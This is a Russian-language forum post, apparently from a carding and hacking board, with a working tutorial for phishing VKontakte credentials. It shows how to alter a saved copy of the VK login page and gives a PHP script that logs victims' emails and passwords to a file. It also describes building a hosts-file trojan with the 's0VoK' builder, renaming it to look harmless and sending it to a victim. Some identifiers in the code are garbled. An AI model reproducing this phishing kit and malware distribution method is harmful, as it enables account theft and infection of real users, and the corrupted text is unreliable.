Перейти к содержимому

DustBlue IPB Skin by CodeGame Networks

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 bruklin232

bruklin232

    Новичок

  • Пользователи
  • Pip
  • Репутация
    0
  • 3 сообщений

Отправлено 05 July 2018 - 17:00

Нам потребуется:
-Установленный веб-сервер
-Фейк вконтакте
-s0VoK трой by s0
-Жертва

Подготовка
Все телодвижения будет происходить на локальном компе. Если же у вас есть дедик, можете использовать его(но если он у вас есть, то данная статья вам не нужна).

Устанаваливаем сервак
Устанавливаем то что душе угодно.(чистый apache, Denwer..) Я предпочитаю - http://php.spb.ru/ph...all_module.html Быстро ставится, и не захламляет систему. На этой странице есть описание как его установить.

Установили? Теперь нам нужен фейк главной страницы Вконтакте. Сделать его можно так:
-Заходим на vkontakte.ru
-В броузере выбираем Файл-Сохранить как...
-Тип файла - HTML-файл с изображениями
-Открываем полученый html файл в любом текстовом редакторе.
-Ищем строку <form
-Ищем параметр action
-Заменяем все что между ковычками action=" ", на login.php. В итоге имеем action="login.php"
-Ищем <span class="ncc"><a href="javascript:quick_login()">Вход</a></span>
-Меняем на <span class="ncc"><a href="javascript:login.submit()">Вход</a></span>
-Переименовываем его в index.php


Было <form method="post" name="login" id="login" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
Стало <form method="post" name="login" id="login" action="login.php" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
Теперь создаем файл login.php и в него пишем:


<?php
$fname = "accounts.txt"; //Файл куда будем сохранять полученные данные
//Получаем данные
$email = $HTTP_POST_VARS['email'];
$password = $HTTP_POST_VARS['pass'];

$dчтоa = $email."-".$password."\r\n";  //Формируем строку для записи в файл
$fp = fopen($fname, "a+") or die("Can not open file"); //Открываем файл
fwrite($fp, $dчтоa); //Пишем в файл
fclose($fp); //Закрываем файл
Header("Locчтоion:vk_login.php"); //Перекидываем юзера на ошибку
?>
vk_login.php - это тот-же index.php, только с текстом о том, что логин-пароль не верны, либо что сервак вконтакте лежит, и пусть попробуют залогинится позже. В общем все на ваш вкус. Сохраняем все это, и кидаем в папку www1(если вы установили сервер от php.spb.ru) Запускаем apache.exe

Подготавливаем троя
-Запускаем s0Vok.exe
-В поле IP Address указываем ваш внешний IP(узнать можно на 2ip.ru
-жмем Creчтоe Me
-Получаем файл run_me.exe, не зубудье его переименовать во что-нибудь нормальное(на подобии SuperRчтоioVKMaster.exe)

Теперь передаем жертве полученый exe файл, и ждем пока она зайдет к вам на страничку, и введет свои данные. Получить вы их сможете в файле accounts.txt

В архиве к статье:
s0VoK.exe - билдер троя
editme.bin - трой
Папка vk - то что мы делали выше, фейк вконтакте

FAQ:
Q - Почему мы используем наш компьютер, а не заливаем фейк на фрихостинг?
A - В файле hosts можно указать только IP адресс, таким образом мы не сможем сделать переадресацию на фрихостинг

Q - У меня ничего не работает
A - Се ля ви, ничем не могу помочь

Q - Как закинуть трояна жертве?
A - По проводам

Q - Жертва запустила файл, но у нее открывается оригинальный вконтакте.ру
A - Возможно у учетки жертвы нет прав на изменение файла hosts





Темы с аналогичным тегами новости в мире кардинга, новости хакеров, кардинг статьи, новости хакинга, стаьи по безопасности, новости кардинг экономики, статьи по кардингу, мировые новости, новости кардинга, криминальные новости экономики

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных